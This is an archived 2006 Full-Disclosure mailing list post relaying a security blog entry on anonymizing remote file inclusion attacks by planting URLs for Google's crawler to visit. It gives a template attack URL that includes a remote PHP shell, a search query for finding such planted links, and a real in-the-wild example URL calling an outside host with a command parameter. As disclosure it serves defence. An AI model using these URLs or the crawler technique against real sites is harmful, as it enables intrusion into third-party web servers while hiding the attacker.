[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.21.0611230640010.21382-100000@linuxbox.org>
Date: Thu, 23 Nov 2006 06:41:49 -0600 (CST)
From: Gadi Evron <ge@...uxbox.org>
To: full-disclosure@...ts.grok.org.uk, funsec@...uxbox.org
Subject: Anonymizing RFI Attacks Through Google
Noam Rathaus on using Google to anonymize attacks on websites:
http://blogs.securiteam.com/index.php/archives/746
Anonymizing RFI Attacks Through Google
noam - November 23, 2006 on 12:03 pm
Google can be utilized to hack into websites - actively exploiting them
(not information gathering by the use of "Google hacking", although that
is how most of the sites vulnerable to RFI attacks are found).
By placing a URL on any web page, Google will find it, visit it and then
index it. With this mechanism, it is possible to anonymize attacks on
third party web sites through Google by the use of its crawler.
PoC -
A malicious web page is constructed by an attacker, containing a URL built
like so:
1. Third party site URI to attack.
2. File inclusion exploit.
3. Second URI containing a malicious PHP shell.
Example URL:
http://victim-site/RFI-exploit?http://URI-with-malicious-code.php
Google will harvest this URL, visit the site using its crawler and index
it.
Meaning accessing the target site with the URL it was provided and
exploiting it unwittingly for whoever planted it. It's a feature, not a
bug.
This is currently exploited in the wild. For example, try searching Google
for:
inurl:cmd.gif
And note, as an example:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
Which is no longer vulnerable.
Why use a botnet when one can abuse the Google crawler, which is allowed
on most web sites?
Notes:
1. This attack was verified on Google, but there is no reason why it
should not work with other search engines, web crawlers and web spiders.
2. File inclusions seem to tie in well with this attack anonymizer, but
there is no reason why others attack types can?t be used in a similar
fashion.
3. The feature might also be used to anonymize communication, as a covert
channel.
Noam Rathaus.
(with thanks to Gadi Evron and Lev Toger)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists